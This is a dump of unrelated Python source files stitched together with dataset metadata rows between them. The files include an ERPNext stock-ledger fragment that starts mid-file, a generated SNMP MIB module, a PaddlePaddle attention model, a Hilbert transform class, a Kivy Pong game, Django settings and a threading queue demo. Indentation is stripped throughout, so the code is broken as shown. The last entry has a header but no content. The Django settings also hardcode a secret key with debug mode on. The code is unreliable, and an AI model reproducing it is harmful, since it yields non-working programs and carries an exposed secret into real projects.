def insert_stock_ledger_entries(self):
""" find difference between current and expected entries
and create stock ledger entries based on the difference"""
from erpnext.stock.utils import get_valuation_method
from erpnext.stock.stock_ledger import get_previous_sle
row_template = ["item_code", "warehouse", "qty", "valuation_rate"]
if not self.reconciliation_json:
msgprint(_("""Stock Reconciliation file not uploaded"""), raise_exception=1)
data = json.loads(self.reconciliation_json)
for row_num, row in enumerate(data[data.index(self.head_row)+1:]):
row = frappe._dict(zip(row_template, row))
row["row_num"] = row_num
previous_sle = get_previous_sle({
"item_code": row.item_code,
"warehouse": row.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time
})
# check valuation rate mandatory
if row.qty != "" and not row.valuation_rate and \
flt(previous_sle.get("qty_after_transaction")) <= 0:
frappe.throw(_("Valuation Rate required for Item {0}").format(row.item_code))
change_in_qty = row.qty != "" and \
(flt(row.qty) - flt(previous_sle.get("qty_after_transaction")))
change_in_rate = row.valuation_rate != "" and \
(flt(row.valuation_rate) - flt(previous_sle.get("valuation_rate")))
if get_valuation_method(row.item_code) == "Moving Average":
self.sle_for_moving_avg(row, previous_sle, change_in_qty, change_in_rate)
else:
self.sle_for_fifo(row, previous_sle, change_in_qty, change_in_rate)
def sle_for_moving_avg(self, row, previous_sle, change_in_qty, change_in_rate):
"""Insert Stock Ledger Entries for Moving Average valuation"""
def _get_incoming_rate(qty, valuation_rate, previous_qty, previous_valuation_rate):
if previous_valuation_rate == 0:
return flt(valuation_rate)
else:
if valuation_rate == "":
valuation_rate = previous_valuation_rate
return (qty * valuation_rate - previous_qty * previous_valuation_rate) \
/ flt(qty - previous_qty)
if change_in_qty:
# if change in qty, irrespective of change in rate
incoming_rate = _get_incoming_rate(flt(row.qty), flt(row.valuation_rate),
flt(previous_sle.get("qty_after_transaction")),
flt(previous_sle.get("valuation_rate")))
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Actual Entry"
self.insert_entries({"actual_qty": change_in_qty, "incoming_rate": incoming_rate}, row)
elif change_in_rate and flt(previous_sle.get("qty_after_transaction")) > 0:
# if no change in qty, but change in rate
# and positive actual stock before this reconciliation
incoming_rate = _get_incoming_rate(
flt(previous_sle.get("qty_after_transaction"))+1, flt(row.valuation_rate),
flt(previous_sle.get("qty_after_transaction")),
flt(previous_sle.get("valuation_rate")))
# +1 entry
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Valuation Adjustment +1"
self.insert_entries({"actual_qty": 1, "incoming_rate": incoming_rate}, row)
# -1 entry
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Valuation Adjustment -1"
self.insert_entries({"actual_qty": -1}, row)
def sle_for_fifo(self, row, previous_sle, change_in_qty, change_in_rate):
"""Insert Stock Ledger Entries for FIFO valuation"""
previous_stock_queue = json.loads(previous_sle.get("stock_queue") or "[]")
previous_stock_qty = sum((batch[0] for batch in previous_stock_queue))
previous_stock_value = sum((batch[0] * batch[1] for batch in \
previous_stock_queue))
def _insert_entries():
if previous_stock_queue != [[row.qty, row.valuation_rate]]:
# make entry as per attachment
if row.qty:
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Actual Entry"
self.insert_entries({"actual_qty": row.qty,
"incoming_rate": flt(row.valuation_rate)}, row)
# Make reverse entry
if previous_stock_qty:
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Reverse Entry"
self.insert_entries({"actual_qty": -1 * previous_stock_qty,
"incoming_rate": previous_stock_qty < 0 and
flt(row.valuation_rate) or 0}, row)
if change_in_qty:
if row.valuation_rate == "":
# dont want change in valuation
if previous_stock_qty > 0:
# set valuation_rate as previous valuation_rate
row.valuation_rate = previous_stock_value / flt(previous_stock_qty)
_insert_entries()
elif change_in_rate and previous_stock_qty > 0:
# if no change in qty, but change in rate
# and positive actual stock before this reconciliation
row.qty = previous_stock_qty
_insert_entries()
def insert_entries(self, opts, row):
"""Insert Stock Ledger Entries"""
args = frappe._dict({
"doctype": "Stock Ledger Entry",
"item_code": row.item_code,
"warehouse": row.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time,
"voucher_type": self.doctype,
"voucher_no": self.name,
"company": self.company,
"stock_uom": frappe.db.get_value("Item", row.item_code, "stock_uom"),
"voucher_detail_no": row.voucher_detail_no,
"fiscal_year": self.fiscal_year,
"is_cancelled": "No"
})
args.update(opts)
self.make_sl_entries([args])
# append to entries
self.entries.append(args)
def delete_and_repost_sle(self):
""" Delete Stock Ledger Entries related to this voucher
and repost future Stock Ledger Entries"""
existing_entries = frappe.db.sql("""select distinct item_code, warehouse
from `tabStock Ledger Entry` where voucher_type=%s and voucher_no=%s""",
(self.doctype, self.name), as_dict=1)
# delete entries
frappe.db.sql("""delete from `tabStock Ledger Entry`
where voucher_type=%s and voucher_no=%s""", (self.doctype, self.name))
# repost future entries for selected item_code, warehouse
for entries in existing_entries:
update_entries_after({
"item_code": entries.item_code,
"warehouse": entries.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time
})
def get_gl_entries(self, warehouse_account=None):
if not self.cost_center:
msgprint(_("Please enter Cost Center"), raise_exception=1)
return super(StockReconciliation, self).get_gl_entries(warehouse_account,
self.expense_account, self.cost_center)
def validate_expense_account(self):
if not cint(frappe.defaults.get_global_default("auto_accounting_for_stock")):
return
if not self.expense_account:
msgprint(_("Please enter Expense Account"), raise_exception=1)
elif not frappe.db.sql("""select * from `tabStock Ledger Entry`"""):
if frappe.db.get_value("Account", self.expense_account, "report_type") == "Profit and Loss":
frappe.throw(_("Difference Account must be a 'Liability' type account, since this Stock Reconciliation is an Opening Entry"))
@frappe.whitelist()
def upload():
from frappe.utils.datautils import read_csv_content_from_uploaded_file
csv_content = read_csv_content_from_uploaded_file()
return filter(lambda x: x and any(x), csv_content)
|
agpl-3.0
| -2,882,474,033,307,407,400 | 35.335505 | 129 | 0.688839 | false | 3.169935 | false | false | false |
kdart/pycopia
|
mibs/pycopia/mibs/SNMP_USER_BASED_SM_MIB.py
|
1
|
8334
|
# python
# This file is generated by a program (mib2py). Any edits will be lost.
from pycopia.aid import Enum
import pycopia.SMI.Basetypes
Range = pycopia.SMI.Basetypes.Range
Ranges = pycopia.SMI.Basetypes.Ranges
from pycopia.SMI.Objects import ColumnObject, MacroObject, NotificationObject, RowObject, ScalarObject, NodeObject, ModuleObject, GroupObject
# imports
from SNMPv2_SMI import MODULE_IDENTITY, OBJECT_TYPE, OBJECT_IDENTITY, snmpModules, Counter32
from SNMPv2_CONF import MODULE_COMPLIANCE, OBJECT_GROUP
from SNMPv2_TC import TEXTUAL_CONVENTION, TestAndIncr, RowStatus, RowPointer, StorageType, AutonomousType
from SNMP_FRAMEWORK_MIB import SnmpAdminString, SnmpEngineID, snmpAuthProtocols, snmpPrivProtocols
class SNMP_USER_BASED_SM_MIB(ModuleObject):
path = '/usr/share/mibs/ietf/SNMP-USER-BASED-SM-MIB'
conformance = 5
name = 'SNMP-USER-BASED-SM-MIB'
language = 2
description = 'The management information definitions for the\nSNMP User-based Security Model.\n\nCopyright (C) The Internet Society (2002). This\nversion of this MIB module is part of RFC 3414;\nsee the RFC itself for full legal notices.'
# nodes
class usmNoAuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 1])
name = 'usmNoAuthProtocol'
class usmHMACMD5AuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 2])
name = 'usmHMACMD5AuthProtocol'
class usmHMACSHAAuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 3])
name = 'usmHMACSHAAuthProtocol'
class usmNoPrivProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 2, 1])
name = 'usmNoPrivProtocol'
class usmDESPrivProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 2, 2])
name = 'usmDESPrivProtocol'
class snmpUsmMIB(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15])
name = 'snmpUsmMIB'
class usmMIBObjects(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1])
name = 'usmMIBObjects'
class usmStats(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1])
name = 'usmStats'
class usmUser(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2])
name = 'usmUser'
class usmMIBConformance(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2])
name = 'usmMIBConformance'
class usmMIBCompliances(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 1])
name = 'usmMIBCompliances'
class usmMIBGroups(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 2])
name = 'usmMIBGroups'
# macros
# types
class KeyChange(pycopia.SMI.Basetypes.OctetString):
status = 1
# scalars
class usmStatsUnsupportedSecLevels(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 1])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsNotInTimeWindows(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 2])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsUnknownUserNames(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 3])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsUnknownEngineIDs(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 4])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsWrongDigests(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 5])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsDecryptionErrors(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 6])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmUserSpinLock(ScalarObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 1])
syntaxobject = pycopia.SMI.Basetypes.TestAndIncr
# columns
class usmUserEngineID(ColumnObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 1])
syntaxobject = SnmpEngineID
class usmUserName(ColumnObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 2])
syntaxobject = SnmpAdminString
class usmUserSecurityName(ColumnObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 3])
syntaxobject = SnmpAdminString
class usmUserCloneFrom(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 4])
syntaxobject = pycopia.SMI.Basetypes.RowPointer
class usmUserAuthProtocol(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 5])
syntaxobject = pycopia.SMI.Basetypes.AutonomousType
class usmUserAuthKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 6])
syntaxobject = KeyChange
class usmUserOwnAuthKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 7])
syntaxobject = KeyChange
class usmUserPrivProtocol(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 8])
syntaxobject = pycopia.SMI.Basetypes.AutonomousType
class usmUserPrivKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 9])
syntaxobject = KeyChange
class usmUserOwnPrivKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 10])
syntaxobject = KeyChange
class usmUserPublic(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 11])
syntaxobject = pycopia.SMI.Basetypes.OctetString
class usmUserStorageType(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 12])
syntaxobject = pycopia.SMI.Basetypes.StorageType
class usmUserStatus(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 13])
syntaxobject = pycopia.SMI.Basetypes.RowStatus
# rows
class usmUserEntry(RowObject):
status = 1
index = pycopia.SMI.Objects.IndexObjects([usmUserEngineID, usmUserName], False)
create = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1])
access = 2
rowstatus = usmUserStatus
columns = {'usmUserEngineID': usmUserEngineID, 'usmUserName': usmUserName, 'usmUserSecurityName': usmUserSecurityName, 'usmUserCloneFrom': usmUserCloneFrom, 'usmUserAuthProtocol': usmUserAuthProtocol, 'usmUserAuthKeyChange': usmUserAuthKeyChange, 'usmUserOwnAuthKeyChange': usmUserOwnAuthKeyChange, 'usmUserPrivProtocol': usmUserPrivProtocol, 'usmUserPrivKeyChange': usmUserPrivKeyChange, 'usmUserOwnPrivKeyChange': usmUserOwnPrivKeyChange, 'usmUserPublic': usmUserPublic, 'usmUserStorageType': usmUserStorageType, 'usmUserStatus': usmUserStatus}
# notifications (traps)
# groups
class usmMIBBasicGroup(GroupObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 2, 1])
group = [usmStatsUnsupportedSecLevels, usmStatsNotInTimeWindows, usmStatsUnknownUserNames, usmStatsUnknownEngineIDs, usmStatsWrongDigests, usmStatsDecryptionErrors, usmUserSpinLock, usmUserSecurityName, usmUserCloneFrom, usmUserAuthProtocol, usmUserAuthKeyChange, usmUserOwnAuthKeyChange, usmUserPrivProtocol, usmUserPrivKeyChange, usmUserOwnPrivKeyChange, usmUserPublic, usmUserStorageType, usmUserStatus]
# capabilities
# special additions
# Add to master OIDMAP.
from pycopia import SMI
SMI.update_oidmap(__name__)
|
apache-2.0
| -6,750,926,250,645,303,000 | 31.940711 | 547 | 0.735781 | false | 2.616641 | false | false | false |
kuke/models
|
fluid/PaddleNLP/neural_machine_translation/rnn_search/attention_model.py
|
1
|
8831
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle.fluid as fluid
from paddle.fluid.contrib.decoder.beam_search_decoder import *
def lstm_step(x_t, hidden_t_prev, cell_t_prev, size):
def linear(inputs):
return fluid.layers.fc(input=inputs, size=size, bias_attr=True)
forget_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
input_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
output_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
cell_tilde = fluid.layers.tanh(x=linear([hidden_t_prev, x_t]))
cell_t = fluid.layers.sums(input=[
fluid.layers.elementwise_mul(
x=forget_gate, y=cell_t_prev), fluid.layers.elementwise_mul(
x=input_gate, y=cell_tilde)
])
hidden_t = fluid.layers.elementwise_mul(
x=output_gate, y=fluid.layers.tanh(x=cell_t))
return hidden_t, cell_t
def seq_to_seq_net(embedding_dim, encoder_size, decoder_size, source_dict_dim,
target_dict_dim, is_generating, beam_size, max_length):
"""Construct a seq2seq network."""
def bi_lstm_encoder(input_seq, gate_size):
# A bi-directional lstm encoder implementation.
# Linear transformation part for input gate, output gate, forget gate
# and cell activation vectors need be done outside of dynamic_lstm.
# So the output size is 4 times of gate_size.
input_forward_proj = fluid.layers.fc(input=input_seq,
size=gate_size * 4,
act='tanh',
bias_attr=False)
forward, _ = fluid.layers.dynamic_lstm(
input=input_forward_proj, size=gate_size * 4, use_peepholes=False)
input_reversed_proj = fluid.layers.fc(input=input_seq,
size=gate_size * 4,
act='tanh',
bias_attr=False)
reversed, _ = fluid.layers.dynamic_lstm(
input=input_reversed_proj,
size=gate_size * 4,
is_reverse=True,
use_peepholes=False)
return forward, reversed
# The encoding process. Encodes the input words into tensors.
src_word_idx = fluid.layers.data(
name='source_sequence', shape=[1], dtype='int64', lod_level=1)
src_embedding = fluid.layers.embedding(
input=src_word_idx,
size=[source_dict_dim, embedding_dim],
dtype='float32')
src_forward, src_reversed = bi_lstm_encoder(
input_seq=src_embedding, gate_size=encoder_size)
encoded_vector = fluid.layers.concat(
input=[src_forward, src_reversed], axis=1)
encoded_proj = fluid.layers.fc(input=encoded_vector,
size=decoder_size,
bias_attr=False)
backward_first = fluid.layers.sequence_pool(
input=src_reversed, pool_type='first')
decoder_boot = fluid.layers.fc(input=backward_first,
size=decoder_size,
bias_attr=False,
act='tanh')
cell_init = fluid.layers.fill_constant_batch_size_like(
input=decoder_boot,
value=0.0,
shape=[-1, decoder_size],
dtype='float32')
cell_init.stop_gradient = False
# Create a RNN state cell by providing the input and hidden states, and
# specifies the hidden state as output.
h = InitState(init=decoder_boot, need_reorder=True)
c = InitState(init=cell_init)
state_cell = StateCell(
inputs={'x': None,
'encoder_vec': None,
'encoder_proj': None},
states={'h': h,
'c': c},
out_state='h')
def simple_attention(encoder_vec, encoder_proj, decoder_state):
# The implementation of simple attention model
decoder_state_proj = fluid.layers.fc(input=decoder_state,
size=decoder_size,
bias_attr=False)
decoder_state_expand = fluid.layers.sequence_expand(
x=decoder_state_proj, y=encoder_proj)
# concated lod should inherit from encoder_proj
mixed_state = encoder_proj + decoder_state_expand
attention_weights = fluid.layers.fc(input=mixed_state,
size=1,
bias_attr=False)
attention_weights = fluid.layers.sequence_softmax(
input=attention_weights)
weigths_reshape = fluid.layers.reshape(x=attention_weights, shape=[-1])
scaled = fluid.layers.elementwise_mul(
x=encoder_vec, y=weigths_reshape, axis=0)
context = fluid.layers.sequence_pool(input=scaled, pool_type='sum')
return context
@state_cell.state_updater
def state_updater(state_cell):
# Define the updater of RNN state cell
current_word = state_cell.get_input('x')
encoder_vec = state_cell.get_input('encoder_vec')
encoder_proj = state_cell.get_input('encoder_proj')
prev_h = state_cell.get_state('h')
prev_c = state_cell.get_state('c')
context = simple_attention(encoder_vec, encoder_proj, prev_h)
decoder_inputs = fluid.layers.concat(
input=[context, current_word], axis=1)
h, c = lstm_step(decoder_inputs, prev_h, prev_c, decoder_size)
state_cell.set_state('h', h)
state_cell.set_state('c', c)
# Define the decoding process
if not is_generating:
# Training process
trg_word_idx = fluid.layers.data(
name='target_sequence', shape=[1], dtype='int64', lod_level=1)
trg_embedding = fluid.layers.embedding(
input=trg_word_idx,
size=[target_dict_dim, embedding_dim],
dtype='float32')
# A decoder for training
decoder = TrainingDecoder(state_cell)
with decoder.block():
current_word = decoder.step_input(trg_embedding)
encoder_vec = decoder.static_input(encoded_vector)
encoder_proj = decoder.static_input(encoded_proj)
decoder.state_cell.compute_state(inputs={
'x': current_word,
'encoder_vec': encoder_vec,
'encoder_proj': encoder_proj
})
h = decoder.state_cell.get_state('h')
decoder.state_cell.update_states()
out = fluid.layers.fc(input=h,
size=target_dict_dim,
bias_attr=True,
act='softmax')
decoder.output(out)
label = fluid.layers.data(
name='label_sequence', shape=[1], dtype='int64', lod_level=1)
cost = fluid.layers.cross_entropy(input=decoder(), label=label)
avg_cost = fluid.layers.mean(x=cost)
feeding_list = ["source_sequence", "target_sequence", "label_sequence"]
return avg_cost, feeding_list
else:
# Inference
init_ids = fluid.layers.data(
name="init_ids", shape=[1], dtype="int64", lod_level=2)
init_scores = fluid.layers.data(
name="init_scores", shape=[1], dtype="float32", lod_level=2)
# A beam search decoder
decoder = BeamSearchDecoder(
state_cell=state_cell,
init_ids=init_ids,
init_scores=init_scores,
target_dict_dim=target_dict_dim,
word_dim=embedding_dim,
input_var_dict={
'encoder_vec': encoded_vector,
'encoder_proj': encoded_proj
},
topk_size=50,
sparse_emb=True,
max_len=max_length,
beam_size=beam_size,
end_id=1,
name=None)
decoder.decode()
translation_ids, translation_scores = decoder()
feeding_list = ["source_sequence"]
return translation_ids, translation_scores, feeding_list
|
apache-2.0
| -6,780,336,246,658,529,000 | 39.140909 | 79 | 0.576265 | false | 3.956541 | false | false | false |
giruenf/GRIPy
|
algo/spectral/Hilbert.py
|
1
|
2141
|
# -*- coding: utf-8 -*-
#
# Class for deal with Analytic Signal
# Universidade Estadual do Norte Fluminense - UENF
# Laboratório de Engenharia de Petróleo - LENEP
# Grupo de Inferência em Reservatório - GIR
# Adriano Paulo Laes de Santana
# September 12th, 2017
#
# The following code is based on
# http://docs.scipy.org/doc/scipy/reference/generated/scipy.signal.hilbert.html
import numpy as np
from scipy.signal import hilbert
class HilbertTransform(object):
def __init__(self, real_signal, sampling):
self._fs = 1 / sampling
self._analytic_signal = hilbert(real_signal)
self._amplitude_envelope = np.abs(self._analytic_signal)
self._instantaneous_phase = np.unwrap(np.angle(self._analytic_signal))
self._instantaneous_frequency = (np.diff(self._instantaneous_phase) /
(2.0 * np.pi) * self._fs)
self._instantaneous_frequency = np.insert(self._instantaneous_frequency, 0, np.nan)
@property
def analytic_signal(self):
return self._analytic_signal
@analytic_signal.setter
def analytic_signal(self, value):
raise Exception('')
@analytic_signal.deleter
def analytic_signal(self):
raise Exception('')
@property
def amplitude_envelope(self):
return self._amplitude_envelope
@amplitude_envelope.setter
def amplitude_envelope(self, value):
raise Exception('')
@amplitude_envelope.deleter
def amplitude_envelope(self):
raise Exception('')
@property
def instantaneous_phase(self):
return self._instantaneous_phase
@instantaneous_phase.setter
def instantaneous_phase(self, value):
raise Exception('')
@instantaneous_phase.deleter
def instantaneous_phase(self):
raise Exception('')
@property
def instantaneous_frequency(self):
return self._instantaneous_frequency
@instantaneous_frequency.setter
def instantaneous_frequency(self, value):
raise Exception('')
@instantaneous_frequency.deleter
def instantaneous_frequency(self):
raise Exception('')
|
apache-2.0
| 9,056,039,645,876,526,000 | 27.878378 | 91 | 0.669162 | false | 3.729494 | false | false | false |
k-yak/kivy_breakout
|
pong/main.py
|
1
|
3115
|
import kivy
kivy.require('1.1.3')
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.properties import NumericProperty, ReferenceListProperty,\
ObjectProperty
from kivy.vector import Vector
from kivy.clock import Clock
from kivy.uix.floatlayout import FloatLayout
class Pong(FloatLayout):
pass
class PongPaddle(Widget):
score = NumericProperty(0)
max = 5
cur = 0
def bounce_ball(self, ball):
if self.collide_widget(ball):
vx, vy = ball.velocity
offset = (ball.center_y - self.center_y) / (self.height / 10)
bounced = Vector(-1 * vx, vy)
if self.max > self.cur:
vel = bounced * 1.1
ball.velocity = vel.x, vel.y + offset
self.cur += 1
else:
ball.velocity = bounced.x, bounced.y + offset
class PongBall(Widget):
velocity_x = NumericProperty(0)
velocity_y = NumericProperty(0)
velocity = ReferenceListProperty(velocity_x, velocity_y)
def move(self):
self.pos = Vector(*self.velocity) + self.pos
class PongGame(Widget):
ball = ObjectProperty(None)
player1 = ObjectProperty(None)
player2 = ObjectProperty(None)
def serve_ball(self, vel=(4, 0)):
self.ball.center = self.center
self.ball.velocity = vel
def update(self, dt):
self.ball.move()
#bounce of paddles
self.player1.bounce_ball(self.ball)
self.player2.bounce_ball(self.ball)
#bounce ball off bottom or top
if (self.ball.y < self.y) or (self.ball.top > self.top):
self.ball.velocity_y *= -1
#went of to a side to score point?
if self.ball.x < self.x:
self.player2.score += 1
self.serve_ball(vel=(4, 0))
if self.ball.x > self.width:
self.player1.score += 1
self.serve_ball(vel=(-4, 0))
def on_touch_move(self, touch):
if touch.x < self.width / 3:
if (touch.y + self.player1.height / 2) > self.height:
self.player1.center_y = self.height - (self.player1.height / 2)
else:
if (touch.y - self.player1.height / 2) < 0:
self.player1.center_y = self.player1.height / 2
else:
self.player1.center_y = touch.y
if touch.x > self.width - self.width / 3:
if (touch.y + self.player2.height / 2) > self.height:
self.player2.center_y = self.height - (self.player2.height / 2)
else:
if (touch.y - self.player2.height / 2) < 0:
self.player2.center_y = self.player2.height / 2
else:
self.player2.center_y = touch.y
class PongApp(App):
def build(self):
game = PongGame()
game.serve_ball()
Clock.schedule_interval(game.update, 1.0 / 60.0)
return game
if __name__ in ('__main__', '__android__'):
PongApp().run()
|
mit
| -4,741,882,946,873,738,000 | 28.262136 | 79 | 0.545746 | false | 3.568156 | false | false | false |
AlphaNerd80/Lists
|
superlists/settings.py
|
1
|
2067
|
"""
Django settings for superlists project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'xmnw6xn$lz)3i1v17lor83lls37&&z-9i@+xasb^f-88h7ew1c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'lists',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'superlists.urls'
WSGI_APPLICATION = 'superlists.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
|
mit
| -1,529,950,277,581,714,700 | 23.607143 | 71 | 0.727141 | false | 3.291401 | false | false | false |
Moggi/python-playground
|
queues_thread.py
|
1
|
1510
|
# From tutorialspoint.com about Python Multithreaded Programming
# https://www.tutorialspoint.com/python/python_multithreading.htm
# !/usr/bin/python
import Queue
import threading
import time
exitFlag = 0
class myThread (threading.Thread):
def __init__(self, threadID, name, q):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.q = q
def run(self):
print("Starting " + self.name)
process_data(self.name, self.q)
print("Exiting " + self.name)
def process_data(threadName, q):
while not exitFlag:
queueLock.acquire()
if not workQueue.empty():
data = q.get()
queueLock.release()
print("%s processing %s" % (threadName, data))
else:
queueLock.release()
time.sleep(1)
threadList = ["Thread-1", "Thread-2", "Thread-3"]
nameList = ["One", "Two", "Three", "Four", "Five"]
queueLock = threading.Lock()
workQueue = Queue.Queue(10)
threads = []
threadID = 1
# Create new threads
for tName in threadList:
thread = myThread(threadID, tName, workQueue)
thread.start()
threads.append(thread)
threadID += 1
# Fill the queue
queueLock.acquire()
for word in nameList:
workQueue.put(word)
queueLock.release()
# Wait for queue to empty
while not workQueue.empty():
pass
# Notify threads it's time to exit
exitFlag = 1
# Wait for all threads to complete
for t in threads:
t.join()
print("Exiting Main Thread")
|
gpl-2.0
| 3,738,729,254,467,271,700 | 21.205882 | 65 | 0.64106 | false | 3.447489 | false | false | false |
luckydonald/shairport-decoder
|
examples/image-average.py
|
1
|
1351
